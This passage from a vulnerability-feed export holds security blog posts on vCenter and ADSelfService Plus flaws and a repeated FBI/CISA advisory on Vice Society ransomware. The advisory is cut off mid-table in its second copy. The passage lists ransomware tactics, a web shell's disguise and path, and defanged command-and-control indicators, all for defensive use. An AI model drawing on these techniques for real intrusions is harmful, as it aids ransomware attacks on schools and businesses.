Server 6.5, are not affected. Others are. You should refer to the [dedicated rundown on](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>) this issue and take appropriate action as soon as you possibly can. We'll leave the last word to VMware with regard to when you should be patching:\n\n> Immediately, the ramifications of this vulnerability are serious and it is a matter of time \u2013 likely minutes after the disclosure \u2013 before working exploits are publicly available.\n> \n> With the threat of ransomware looming nowadays the safest stance is to assume that an attacker may already have control of a desktop and a user account through the use of techniques like phishing or spearphishing, and act accordingly. This means the attacker may already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence.\n\nThis seems like very good advice.\n\nThe post [Patch vCenter Server "right now", VMWare expects CVE-2021-22005 exploitation within minutes of disclosure](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-22T11:27:11", "type": "malwarebytes", "title": "Patch vCenter Server \u201cright now\u201d, VMWare expects CVE-2021-22005 exploitation within minutes of disclosure", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-22T11:27:11", "id": "MALWAREBYTES:8791EE404FCD2E2A063F220E6486B422", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-17T14:35:09", "description": "In a [joint advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) the FBI, the United States Coast Guard Cyber Command (CGCYBER), and the Cybersecurity and Infrastructure Security Agency (CISA) warn that advanced persistent threat (APT) cyber-actors may be exploiting a vulnerability in ManageEngine's single sign-on (SSO) solution.\n\n### The vulnerability\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The vulnerability in questions is listed under [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) as a REST API authentication bypass with resultant remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus version 6113 and prior.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This would allows attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it's a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network.\n\n### In-the-wild exploitation\n\nWhen [word of the vulnerability came out](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) it was already clear that is was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other [researchers](<https://twitter.com/voodoodahl1/status/1435673340539281410>) chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat-actor. Yesterday's joint advisory seems to support that, telling us that APT cyber-actors are likely among those exploiting the vulnerability. \n\nThey find this of high concern since this poses a serious risk to critical infrastructure companies. CISA recognizes [16 critical infrastructure sectors](<https://www.cisa.gov/critical-infrastructure-sectors>) whose "assets, systems, and networks, whether physical or virtual, are considered so vital to the United States that their incapacitation or destruction would have a debilitating effect on security, national economic security, national public health or safety, or any combination thereof."\n\nThe joint advisory points out that the suspected APT cyber-actors have targeted academic institutions, defense contractors, and critical infrastructure entities in multiple industry sectors\u2014including transportation, IT, manufacturing, communications, logistics, and finance.\n\nIt also warns that successful exploitation of the vulnerability allows an attacker to place web shells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files.\n\nAccording to the advisory, the JavaServer Pages web shell arrives as a `.zip` file "masquerading as an x509 certificate" called `service.cer`. The web shell is then accessed via the URL path `/help/admin-guide/Reports/ReportGenerate.jsp`. \n\nHowever, it warns:\n\n> Confirming a successful compromise of ManageEngine ADSelfService Plus may be difficult\u2014the attackers run clean-up scripts designed to remove traces of the initial point of compromise and hide any relationship between exploitation of the vulnerability and the web shell.\n\nPlease consult the advisory for a [full list of IOCs](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>).\n\n### Mitigation\n\nA patch for this vulnerability was made available on September 7, 2021. Users are advised to update to ADSelfService Plus build 6114. The FBI, CISA, and CGCYBER also strongly urge organizations to make sure that ADSelfService Plus is not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations. It also has information about how you can reach out to support if you need further information, have any questions, or face any difficulties updating ADSelfService Plus.\n\nStay safe, everyone!\n\nThe post [FBI and CISA warn of APT groups exploiting ADSelfService Plus](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-17T13:48:46", "type": "malwarebytes", "title": "FBI and CISA warn of APT groups exploiting ADSelfService Plus", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-17T13:48:46", "id": "MALWAREBYTES:B6DA5FE033D50131FABF027A2BB04385", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ics": [{"lastseen": "2023-12-03T17:06:33", "description": "### Summary\n\nActions to take today to mitigate cyber threats from ransomware:\n\n\u2022 Prioritize and remediate [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n\u2022 Train users to recognize and report phishing attempts. \n\u2022 Enable and enforce multifactor authentication.\n\n_**Note:** This joint Cybersecurity Advisory (CSA) is part of an ongoing [#StopRansomware](<https://www.cisa.gov/stopransomware/stopransomware>) effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources._\n\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate IOCs and TTPs associated with Vice Society actors identified through FBI investigations as recently as September 2022. The FBI, CISA, and the MS-ISAC have recently observed Vice Society actors disproportionately targeting the education sector with ransomware attacks.\n\nOver the past several years, the education sector, especially kindergarten through twelfth grade (K-12) institutions, have been a frequent target of ransomware attacks. Impacts from these attacks have ranged from restricted access to networks and data, delayed exams, canceled school days, and unauthorized access to and theft of personal information regarding students and staff. The FBI, CISA, and the MS-ISAC anticipate attacks may increase as the 2022/2023 school year begins and criminal ransomware groups perceive opportunities for successful attacks. School districts with limited cybersecurity capabilities and constrained resources are often the most vulnerable; however, the opportunistic targeting often seen with cyber criminals can still put school districts with robust cybersecurity programs at risk. K-12 institutions may be seen as particularly lucrative targets due to the amount of [sensitive student data](<https://www.ic3.gov/Media/News/2022/220526.pdf>) accessible through school systems or their managed service providers. \n\nThe FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.\n\nDownload the PDF version of this report: pdf, 521 KB\n\nDownload the IOCs: .stix 31 kb\n\n### Technical Details\n\n**Note:** This advisory uses the MITRE ATT&CK\u00ae for Enterprise framework, version 11. See [MITRE ATT&CK for Enterprise](<https://attack.mitre.org/versions/v11/matrices/enterprise/>) for all referenced tactics and techniques.\n\nVice Society is an intrusion, exfiltration, and extortion hacking group that first appeared in summer 2021. Vice Society actors do not use a ransomware variant of unique origin. Instead, the actors have deployed versions of [Hello Kitty/Five Hands](<https://www.cisa.gov/sites/default/files/publications/FLASH_CU_000154_MW_508c.pdf>) and [Zeppelin ransomware](<https://www.cisa.gov/uscert/ncas/alerts/aa22-223a>), but may deploy other variants in the future.\n\nVice Society actors likely obtain initial network access through compromised credentials by exploiting internet-facing applications [[T1190](<https://attack.mitre.org/versions/v11/techniques/T1190/>)]. Prior to deploying ransomware, the actors spend time exploring the network, identifying opportunities to increase accesses, and exfiltrating data [[TA0010](<https://attack.mitre.org/versions/v11/tactics/TA0010/>)] for double extortion--a tactic whereby actors threaten to publicly release sensitive data unless a victim pays a ransom. Vice Society actors have been observed using a variety of tools, including SystemBC, PowerShell Empire, and Cobalt Strike to move laterally. They have also used \u201cliving off the land\u201d techniques targeting the legitimate Windows Management Instrumentation (WMI) service [[T1047](<https://attack.mitre.org/versions/v11/techniques/T1047/>)] and tainting shared content [[T1080](<https://attack.mitre.org/versions/v11/techniques/T1080/>)]. \n\nVice Society actors have been observed exploiting the PrintNightmare vulnerability ([CVE-2021-1675](<https://nvd.nist.gov/vuln/detail/CVE-2021-1675>) and [CVE-2021-34527](<https://nvd.nist.gov/vuln/detail/CVE-2021-34527>) ) to escalate privileges [[T1068](<https://attack.mitre.org/versions/v11/techniques/T1068/>)]. To maintain persistence, the criminal actors have been observed leveraging scheduled tasks [[T1053](<https://attack.mitre.org/versions/v11/techniques/T1053/>)], creating undocumented autostart Registry keys [[T1547.001](<https://attack.mitre.org/techniques/T1547/001/>)], and pointing legitimate services to their custom malicious dynamic link libraries (DLLs) through a tactic known as DLL side-loading [[T1574.002](<https://attack.mitre.org/versions/v11/techniques/T1547/002/>)]. Vice Society actors attempt to evade detection through masquerading their malware and tools as legitimate files [[T1036](<https://attack.mitre.org/versions/v11/techniques/T1036/>)], using process injection [[T1055](<https://attack.mitre.org/versions/v11/techniques/T1055/>)], and likely use evasion techniques to defeat automated dynamic analysis [[T1497](<https://attack.mitre.org/versions/v11/techniques/T1497/>)]. Vice Society actors have been observed escalating privileges, then gaining access to domain administrator accounts, and running scripts to change the passwords of victims\u2019 network accounts to prevent the victim from remediating. \n\n### Indicators of Compromise (IOCs)\n\nEmail Addresses \n \n--- \n \nv-society.official@onionmail[.]org \n \nViceSociety@onionmail[.]org \n \nOnionMail email accounts in the format of [First Name][Last Name]@onionmail[.]org \n \nTOR Address \n \n--- \n \nhttp://vsociethok6sbprvevl4dlwbqrzyhxcxaqpvcqt5belwvsuxaxsutyad[.]onion \n \nIP Addresses for C2\n\n| \n\nConfidence Level \n \n---|--- \n \n5.255.99[.]59\n\n| \n\nHigh Confidence \n \n5.161.136[.]176\n\n| \n\nMedium Confidence \n \n198.252.98[.]184\n\n| \n\nMedium Confidence \n \n194.34.246[.]90\n\n| \n\nLow Confidence \n \nSee Table 1 for file hashes obtained from FBI incident response investigations in September 2022.\n\n_Table 1: File Hashes as of September 2022_\n\nMD5\n\n| \n\nSHA1 \n \n---|--- \n \nfb91e471cfa246beb9618e1689f1ae1d\n\n| \n\na0ee0761602470e24bcea5f403e8d1e8bfa29832 \n \n| \n\n3122ea585623531df2e860e7d0df0f25cce39b21 \n \n| \n\n41dc0ba220f30c70aea019de214eccd650bc6f37 \n \n| \n\nc9c2b6a5b930392b98f132f5395d54947391cb79 \n \n### MITRE ATT&CK TECHNIQUES\n\nVice Society actors have used ATT&CK techniques, similar to Zeppelin techniques, listed in Table 2.\n\n_Table 2: Vice Society Actors ATT&CK Techniques for Enterprise_\n\n_Initial Access_ \n \n--- \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nExploit Public-Facing Application\n\n| \n\n[T1190](<https://attack.mitre.org/versions/v11/techniques/T1190/>)\n\n| \n\nVice Society actors exploit vulnerabilities in an internet-facing systems to gain access to victims\u2019 networks. \n \nValid Accounts\n\n| \n\n[T1078](<https://attack.mitre.org/versions/v11/techniques/T1078/>)\n\n| \n\nVice Society actors obtain initial network access through compromised valid accounts. \n \n_Execution_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nWindows Management Instrumentation (WMI)\n\n| \n\n[T1047](<https://attack.mitre.org/versions/v11/techniques/T1047/>)\n\n| \n\nVice Society actors leverage WMI as a means of \u201cliving off the land\u201d to execute malicious commands. WMI is a native Windows administration feature. \n \nScheduled Task/Job\n\n| \n\n[T1053](<https://attack.mitre.org/versions/v11/techniques/T1053/>)\n\n| \n\nVice Society have used malicious files that create component task schedule objects, which are often mean to register a specific task to autostart on system boot. This facilitates recurring execution of their code. \n \n_Persistence_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nModify System Process\n\n| \n\n[T1543.003](<https://attack.mitre.org/versions/v11/techniques/T1543/003/>)\n\n| \n\nVice Society actors encrypt Windows Operating functions to preserve compromised system functions. \n \nRegistry Run Keys/Startup Folder\n\n| \n\n[T1547.001](<https://attack.mitre.org/versions/v11/techniques/T1547/001/>)\n\n| \n\nVice Society actors have employed malicious files that create an undocumented autostart Registry key to maintain persistence after boot/reboot. \n \nDLL Side-Loading\n\n| \n\n[T1574.002](<https://attack.mitre.org/versions/v11/techniques/T1547/002/>)\n\n| \n\nVice Society actors may directly side-load their payloads by planting their own DLL then invoking a legitimate application that executes the payload within that DLL. This serves as both a persistence mechanism and a means to masquerade actions under legitimate programs. \n \n_Privilege Escalation_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nExploitation for Privilege Escalation\n\n| \n\n[T1068](<https://attack.mitre.org/versions/v11/techniques/T1068/>)\n\n| \n\nVice Society actors have been observed exploiting PrintNightmare vulnerability ([CVE-2021-1675](<https://nvd.nist.gov/vuln/detail/CVE-2021-1675>) and [CVE-2021-34527](<https://nvd.nist.gov/vuln/detail/CVE-2021-34527>)) to escalate privileges. \n \n_Defense Evasion_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nMasquerading\n\n| \n\n[T1036](<https://attack.mitre.org/versions/v11/techniques/T1036/>)\n\n| \n\nVice Society actors may attempt to manipulate features of the files they drop in a victim\u2019s environment to mask the files or make the files appear legitimate. \n \nProcess Injection\n\n| \n\n[T1055](<https://attack.mitre.org/versions/v11/techniques/T1055/>)\n\n| \n\nVice Society artifacts have been analyzed to reveal the ability to inject code into legitimate processes for evading process-based defenses. This tactic has other potential impacts, including the ability to escalate privileges or gain additional accesses. \n \nSandbox Evasion\n\n| \n\n[T1497](<https://attack.mitre.org/versions/v11/techniques/T1497/>)\n\n| \n\nVice Society actors may have included sleep techniques in their files to hinder common reverse engineering or dynamic analysis. \n \n_Lateral Movement_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nTaint Shared Content\n\n| \n\n[T1080](<https://attack.mitre.org/versions/v11/techniques/T1080/>)\n\n| \n\nVice Society actors may deliver payloads to remote systems by adding content to shared storage locations such as network drives. \n \n_Exfiltration_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nExfiltration\n\n| \n\n[TA0010](<https://attack.mitre.org/versions/v11/tactics/TA0010/>)\n\n| \n\nVice Society actors are known for double extortion, which is a second attempt to force a victim to pay by threatening to expose sensitive information if the victim does not pay a ransom. \n \n_Impact_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nData Encrypted for Impact\n\n| \n\n[T1486](<https://attack.mitre.org/versions/v11/techniques/T1486/>)\n\n| \n\nVice Society actors have encrypted data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. \n \nAccount Access Removal\n\n| \n\n[T1531](<https://attack.mitre.org/versions/v11/techniques/T1531/>)\n\n| \n\nVice Society actors run a script to change passwords of victims\u2019 email accounts. \n \n### Mitigations\n\nThe FBI and CISA recommend organizations, particularly the education sector, establish and maintain strong liaison relationships with the FBI Field Office in their region and their regional CISA Cybersecurity Advisor. The location and contact information for FBI Field Offices and CISA Regional Offices can be located at [www.fbi.gov/contact-us/field-offices](<http://www.fbi.gov/contact-us/field-offices>) and [www.cisa.gov/cisa-regions](<https://www.cisa.gov/cisa-regions>), respectively. Through these partnerships, the FBI and CISA can assist with identifying vulnerabilities to academia and mitigating potential threat activity. The FBI and CISA further recommend that academic entities review and, if needed, update incident response and communication plans that list actions an organization will take if impacted by a cyber incident.\n\nThe FBI, CISA, and the MS-ISAC recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Vice Society actors:\n\n**Preparing for Cyber Incidents**\n\n * Maintain offline backups of data, and regularly maintain backup and restoration. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data. \n * Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure. Ensure your backup data is not already infected.\n * Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.\n * Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs under an established security policy.\n * Document and monitor external remote connections. Organizations should document approved solutions for remote management and maintenance, and immediately investigate if an unapproved solution is installed on a workstation.\n * Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).\n\nIdentity and Access Management\n\n * Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with [National Institute of Standards and Technology (NIST) standards](<https://pages.nist.gov/800-63-3/>) for developing and managing password policies. \n * Use longer passwords consisting of at least 8 characters and no more than 64 characters in length;\n * Store passwords in hashed format using industry-recognized password managers;\n * Add password user \u201csalts\u201d to shared login credentials;\n * Avoid reusing passwords;\n * Implement multiple failed login attempt account lockouts;\n * Disable password \u201chints\u201d;\n * Refrain from requiring password changes more frequently than once per year unless a password is known or suspected to be compromised. \nNote: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password \u201cpatterns\u201d cyber criminals can easily decipher. \n * Require administrator credentials to install software.\n * Require phishing-resistant multifactor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems. \n * Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.\n * Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege. \n * Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task. \n\nProtective Controls and Architecture\n\n * Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between\u2014and access to\u2014various subnetworks and by restricting adversary lateral movement. \n * Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host. \n * Install, regularly update, and enable real time detection for antivirus software on all hosts. \n * Secure and closely monitor remote desktop protocol (RDP) use. \n * Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. If RDP is deemed operationally necessary, restrict the originating sources and require MFA to mitigate credential theft and reuse. If RDP must be available externally, use a VPN, virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices. Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports.\n\nVulnerability and Configuration Management\n\n * Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should prioritize patching of vulnerabilities on CISA\u2019s [Known Exploited Vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) catalog.\n * Disable unused ports.\n * Consider adding an email banner to emails received from outside your organization.\n * Disable hyperlinks in received emails.\n * Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally. \n * Ensure devices are properly configured and that security features are enabled. \n * Disable ports and protocols that are not being used for a business purpose (e.g., RDP Transmission Control Protocol Port 3389).\n * Restrict Server Message Block (SMB) Protocol within the network to only access servers that are necessary, and remove or disable outdated versions of SMB (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.\n\n### REFERENCES\n\n * [Stopransomware.gov](<https://www.cisa.gov/stopransomware>) is a whole-of-government approach that gives one central location for ransomware resources and alerts.\n * Resource to mitigate a ransomware attack: [CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C.pdf>).\n * No-cost cyber hygiene services: [Cyber Hygiene Services](<https://www.cisa.gov/cyber-hygiene-services>) and [Ransomware Readiness Assessment](<https://github.com/cisagov/cset/>).\n\n### REPORTING\n\nThe FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Vice Society actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. \n\nThe FBI, CISA, and the MS-ISAC strongly discourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a [local FBI Field Office](<https://www.fbi.gov/contact-us/field-offices>), or to CISA at [report@cisa.gov](<mailto:report@cisa.gov>) or (888) 282-0870. SLTT government entities can also report to the MS-ISAC ([SOC@cisecurity.org](<mailto:SOC@cisecurity.org>) or 866-787-4722).\n\n### DISCLAIMER\n\nThe information in this report is being provided \u201cas is\u201d for informational purposes only. The FBI, CISA, and the MS-ISAC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, or the MS-ISAC.\n\n### Revisions\n\nSeptember 6, 2022: Initial Version\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-08T12:00:00", "type": "ics", "title": "#StopRansomware: Vice Society", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-09-08T12:00:00", "id": "AA22-249A-0", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-249a-0", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T17:06:18", "description": "_**Note:** This joint Cybersecurity Advisory (CSA) is part of an ongoing [#StopRansomware](<https://www.cisa.gov/stopransomware/stopransomware>) effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources._\n\n**Actions to take today to mitigate cyber threats from ransomware:**\n\n\u2022 Prioritize and remediate known exploited vulnerabilities. \n\u2022 Train users to recognize and report phishing attempts. \n\u2022 Enable and enforce multifactor authentication.\n\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate IOCs and TTPs associated with Vice Society actors identified through FBI investigations as recently as September 2022. The FBI, CISA, and the MS-ISAC have recently observed Vice Society actors disproportionately targeting the education sector with ransomware attacks.\n\nOver the past several years, the education sector, especially kindergarten through twelfth grade (K-12) institutions, have been a frequent target of ransomware attacks. Impacts from these attacks have ranged from restricted access to networks and data, delayed exams, canceled school days, and unauthorized access to and theft of personal information regarding students and staff. The FBI, CISA, and the MS-ISAC anticipate attacks may increase as the 2022/2023 school year begins and criminal ransomware groups perceive opportunities for successful attacks. School districts with limited cybersecurity capabilities and constrained resources are often the most vulnerable; however, the opportunistic targeting often seen with cyber criminals can still put school districts with robust cybersecurity programs at risk. K-12 institutions may be seen as particularly lucrative targets due to the amount of [sensitive student data](<https://www.ic3.gov/Media/News/2022/220526.pdf>) accessible through school systems or their managed service providers.\n\nThe FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.\n\nDownload the PDF version of this report: pdf, 521 KB\n\nDownload the IOCs: [.stix 31 kb](<https://www.cisa.gov/uscert/sites/default/files/publications/AA22-249A.stix.xml>)\n\n### Technical Details\n\n**Note:** _This advisory uses the MITRE ATT&CK_\u00ae_ for Enterprise framework, version 11. See _[_MITRE ATT&CK for Enterprise_](<https://attack.mitre.org/versions/v11/matrices/enterprise/>)_ for all referenced tactics and techniques_.\n\nVice Society is an intrusion, exfiltration, and extortion hacking group that first appeared in summer 2021. Vice Society actors do not use a ransomware variant of unique origin. Instead, the actors have deployed versions of Hello Kitty/Five Hands and Zeppelin ransomware, but may deploy other variants in the future.\n\nVice Society actors likely obtain initial network access through compromised credentials by exploiting internet-facing applications [[T1190](<https://attack.mitre.org/versions/v11/techniques/T1190/>)]. Prior to deploying ransomware, the actors spend time exploring the network, identifying opportunities to increase accesses, and exfiltrating data [[TA0010](<https://attack.mitre.org/versions/v11/tactics/TA0010/>)] for double extortion--a tactic whereby actors threaten to publicly release sensitive data unless a victim pays a ransom. Vice Society actors have been observed using a variety of tools, including SystemBC, PowerShell Empire, and Cobalt Strike to move laterally. They have also used \u201cliving off the land\u201d techniques targeting the legitimate Windows Management Instrumentation (WMI) service [[T1047](<https://attack.mitre.org/versions/v11/techniques/T1047/>)] and tainting shared content [[T1080](<https://attack.mitre.org/versions/v11/techniques/T1080/>)].\n\nVice Society actors have been observed exploiting the PrintNightmare vulnerability ([CVE-2021-1675](<https://nvd.nist.gov/vuln/detail/CVE-2021-1675>) and [CVE-2021-34527](<https://nvd.nist.gov/vuln/detail/CVE-2021-34527>) ) to escalate privileges [[T1068](<https://attack.mitre.org/versions/v11/techniques/T1068/>)]. To maintain persistence, the criminal actors have been observed leveraging scheduled tasks [[T1053](<https://attack.mitre.org/versions/v11/techniques/T1053/>)], creating undocumented autostart Registry keys [[T1547.001](<https://attack.mitre.org/techniques/T1547/001/>)], and pointing legitimate services to their custom malicious dynamic link libraries (DLLs) through a tactic known as DLL side-loading [[T1574.002](<https://attack.mitre.org/versions/v11/techniques/T1547/002/>)]. Vice Society actors attempt to evade detection through masquerading their malware and tools as legitimate files [[T1036](<https://attack.mitre.org/versions/v11/techniques/T1036/>)], using process injection [[T1055](<https://attack.mitre.org/versions/v11/techniques/T1055/>)], and likely use evasion techniques to defeat automated dynamic analysis [[T1497](<https://attack.mitre.org/versions/v11/techniques/T1497/>)]. Vice Society actors have been observed escalating privileges, then gaining access to domain administrator accounts, and running scripts to change the passwords of victims\u2019 network accounts to prevent the victim from remediating. \n\n### Indicators of Compromise (IOCs)\n\n**Email Addresses** \n--- \nv-society.official@onionmail[.]org \nViceSociety@onionmail[.]org \nOnionMail email accounts in the format of [First Name][Last Name]@onionmail[.]org \n \n**TOR Address** \n--- \nhttp://vsociethok6sbprvevl4dlwbqrzyhxcxaqpvcqt5belwvsuxaxsutyad[.]onion \n \n**IP Addresses for C2** | **Confidence Level** \n---|--- \n5.255.99[.]59 | High Confidence \n5.161.136[.]176 | Medium Confidence \n198.252.98[.]184 | Medium Confidence \n194.34.246[.]90 | Low Confidence \n \n_See Table 1 for file hashes obtained from FBI incident response investigations in September 2022._\n\n_Table 1: File Hashes as of September 2022_\n\n**MD5** | **SHA1** \n---|--- \nfb91e471cfa246beb9618e1689f1ae1d | a0ee0761602470e24bcea5f403e8d1e8bfa29832 \n| 3122ea585623531df2e860e7d0df0f25cce39b21 \n| 41dc0ba220f30c70aea019de214eccd650bc6f37 \n| c9c2b6a5b930392b98f132f5395d54947391cb79 \n \n### MITRE ATT&CK TECHNIQUES\n\nVice Society actors have used ATT&CK techniques, similar to Zeppelin techniques, listed in Table 2.\n\n_Table 2: Vice Society Actors ATT&CK Techniques for Enterprise_\n\n**_Initial Access_** \n \n--- \n \n**Technique Title**\n\n| \n\n**ID**\n\n| \n\n**Use** \n \nExploit Public-Facing Application\n\n| \n\n[T1190](<https://attack.mitre.org/versions/v11/techniques/T1190/>)\n\n| \n\nVice Society actors exploit vulnerabilities in an internet-facing systems to gain access to victims\u2019 networks. \n \nValid Accounts\n\n| \n\n[T1078](<https://attack.mitre.org/versions/v11/techniques/T1078/>)\n\n| \n\nVice Society actors obtain initial network access through compromised valid accounts. \n \n**_Execution_** \n \n**Technique Title**\n\n| \n\n**ID**\n\n| \n\n**Use** \n \nWindows Management Instrumentation (WMI)\n\n| 